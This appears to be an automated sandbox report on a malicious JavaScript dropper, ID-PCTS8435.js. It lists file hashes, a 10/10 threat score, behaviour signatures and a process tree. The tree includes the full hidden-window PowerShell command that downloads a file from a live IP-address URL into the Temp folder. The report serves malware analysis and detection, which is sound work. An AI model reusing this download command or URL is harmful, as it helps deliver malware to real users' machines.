Analysis
-
max time kernel
123s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
15-11-2024 18:46
Static task
static1
Behavioral task
behavioral1
Sample
ID-PCTS8435.js
Resource
win7-20240708-en
6 signatures
150 seconds
General
-
Target
ID-PCTS8435.js
-
Size
2KB
-
MD5
9881a8b65b41433a8d7a3bb68f382e94
-
SHA1
5d7b75c19bf11e1a3996a83258030759344d67b1
-
SHA256
0909faba191b7f68cc08f8fc4c4adeb91224086fdd79ce5b050811747afd00ce
-
SHA512
7c555e960b1c9e9e8b3d89ce68b7dc1cdc230afcb3ca6cbab22f92aa72ac1e3a7a16a17e1725580f33dd8fa136ad3d7c350fd2d4e20c9378f28b46b8112c7080
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://66.206.25.2/1/text.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1852 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1852 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1852 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2568 wrote to memory of 1852 2568 wscript.exe 30 PID 2568 wrote to memory of 1852 2568 wscript.exe 30 PID 2568 wrote to memory of 1852 2568 wscript.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ID-PCTS8435.js1⤵
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "try { (New-Object System.Net.WebClient).DownloadFile('http://66.206.25.2/1/text.txt', 'C:\\Users\\Admin\\AppData\\Local\\Temp\\sdA9cWXr.txt'); Write-Output 'Download successful'; } catch { Write-Output 'Download failed: ' + $_.Exception.Message; exit 1; }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-